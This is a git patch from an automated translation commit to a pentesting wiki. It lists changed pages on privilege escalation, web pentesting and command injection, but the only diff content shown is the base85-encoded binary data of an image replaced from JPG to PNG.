From c973b260999d5c1f4f3bd087899df1340bb697e1 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 7 Oct 2025 10:23:26 +0000
Subject: [PATCH] Translated ['',
 'src/linux-hardening/privilege-escalation/README.md', 's

---
 src/images/k8studio.jpg                       | Bin 6667 -> 0 bytes
 src/images/k8studio.png                       | Bin 0 -> 88827 bytes
 .../privilege-escalation/README.md            | 588 +++++++++---------
 .../pentesting-web/cgi.md                     |  51 +-
 .../pentesting-web/web-api-pentesting.md      |  98 ++-
 .../pentesting-web/wordpress.md               | 408 ++++++------
 src/pentesting-web/command-injection.md       |  45 +-
 src/welcome/hacktricks-values-and-faq.md      | 118 ++--
 8 files changed, 671 insertions(+), 637 deletions(-)
 delete mode 100644 src/images/k8studio.jpg
 create mode 100644 src/images/k8studio.png

diff --git a/src/images/k8studio.jpg b/src/images/k8studio.jpg
deleted file mode 100644
index 1c427e89fa5348b69ee377112fe4841a2960c2f8..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6667
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
aSMyP>bE5UmqebZX#jO=e^LrmJ_Wd8$Cy6rv

diff --git a/src/images/k8studio.png b/src/images/k8studio.png
new file mode 100644
index 0000000000000000000000000000000000000000..0add889f2f1854c1141ca35b43a867a37bbb1b57
GIT binary patch
literal 88827
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
